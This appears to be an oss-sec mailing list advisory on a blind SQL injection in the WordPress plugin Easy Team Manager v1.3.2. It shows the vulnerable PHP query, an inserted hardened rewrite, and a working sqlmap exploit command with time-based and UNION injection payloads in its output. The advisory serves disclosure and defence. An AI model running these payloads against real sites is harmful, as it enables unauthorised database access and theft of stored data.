oss-sec mailing list archives

Blind SQL Injection in WordPress Plugin Easy Team Manager v1.3.2


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 30 May 2017 18:46:16 -0400

Title: Blind SQL Injection in WordPress Plugin Easy Team Manager v1.3.2
Author: Larry W. Cashdollar, @_larry0
Date: 2017-05-24
CVE-ID:[CVE-2017-1002023]
Download Site: https://wordpress.org/plugins/easy-team-manager/
Vendor: https://daisythemes.com/
Vendor Notified: 2017-05-24
Vendor Contact: web form contact
Advisory: http://www.vapidlabs.com/advisory.php?v=194
Description: Easy Team Manager helps you create team members with short descriptions and social profile links, with smooth hover effects.
Vulnerability:
The following code does not sanitize $_GET['id'] before making it part of an SQL statement in the file ./easy-team-manager/inc/easy_team_manager_desc_edit.php:

        global $wpdb;
        // $_GET['id'] is concatenated straight into the query: no casting, escaping or $wpdb->prepare()
        $easy_team_manager_desc = $wpdb->get_results("SELECT *from ".$wpdb->prefix."easy_team_manager_description where id=".$_GET['id']);
        foreach ($easy_team_manager_desc as $s ){
            $ind_name_detail = unserialize($s->name);
            $socia_media = unserialize($s->social_media);
            $id=$_GET['id'];
            $ind_position = esc_attr($s->position);
            $ind_image=$s->image;
            $ind_email_detail = unserialize($s->email);
            $ind_phone_detail = unserialize($s->phone);
            $ind_desc = esc_attr(stripcslashes($s->ind_description));
        }

This allows blind SQL injection via the id parameter by an authenticated user with edit team privileges.
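For contrast, here is a hardened rewrite of the lookup above. It is an added example, not the plugin's code or a vendor patch; it assumes it runs inside the plugin's admin page handler and uses 'edit_posts' as a stand-in for whatever capability the plugin actually requires. The id is coerced to an integer and then bound with $wpdb->prepare(), so the SQL text never contains user-controlled characters.

```php
<?php
// Added example (not the plugin's code): hardened replacement for the vulnerable query.
// Assumptions: executed inside the WordPress admin page handler; 'edit_posts' is a
// placeholder for the capability the plugin really checks.

function etm_load_member_description_safely() {
    global $wpdb;

    // 1. Authorisation: refuse early unless the caller may edit team members.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( esc_html__( 'You are not allowed to edit team members.' ), 403 );
    }

    // 2. Type enforcement: a row id is a non-negative integer, so coerce it.
    //    Input such as "1 UNION ALL SELECT ..." or "(CASE WHEN ...)" collapses to 1 or 0.
    $id = isset( $_GET['id'] ) ? absint( wp_unslash( $_GET['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_die( esc_html__( 'Invalid team member id.' ), 400 );
    }

    // 3. Parameterisation: %d binds the value, so even without step 2 the query
    //    could not be altered by the request. The table prefix is trusted config.
    $table = $wpdb->prefix . 'easy_team_manager_description';
    $sql   = $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id );
    $rows  = $wpdb->get_results( $sql );

    $members = array();
    foreach ( $rows as $s ) {
        $members[] = array(
            'id'           => (int) $s->id,
            // maybe_unserialize() returns the value unchanged if it is not serialized.
            'name'         => maybe_unserialize( $s->name ),
            'social_media' => maybe_unserialize( $s->social_media ),
            'position'     => esc_attr( $s->position ),
            'image'        => esc_url( $s->image ),
            'email'        => maybe_unserialize( $s->email ),
            'phone'        => maybe_unserialize( $s->phone ),
            'description'  => esc_attr( stripcslashes( $s->ind_description ) ),
        );
    }
    return $members;
}
```

With this in place the sqlmap run shown below would find no injectable parameter, because every candidate payload is reduced to a single integer before it reaches MySQL.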

Exploit Code:
        $ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*' --load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql

        [08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable
        URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
        sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests:
        ---
        Parameter: #1* (URI)
            Type: AND/OR time-based blind
            Title: MySQL >= 5.0.12 time-based blind - Parameter replace
            Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN (3623=3623) THEN SLEEP(5) ELSE 3623 END)
            Type: UNION query
            Title: MySQL UNION query (84) - 5 columns
            Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION ALL SELECT 84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84#
        ---
        [08:39:15] [INFO] the back-end DBMS is MySQL
        web server operating system: Linux Ubuntu 16.04 (xenial)
        web application technology: Apache 2.4.18
        back-end DBMS: MySQL >= 5.0.12
        [08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

        [*] shutting down at 08:39:15
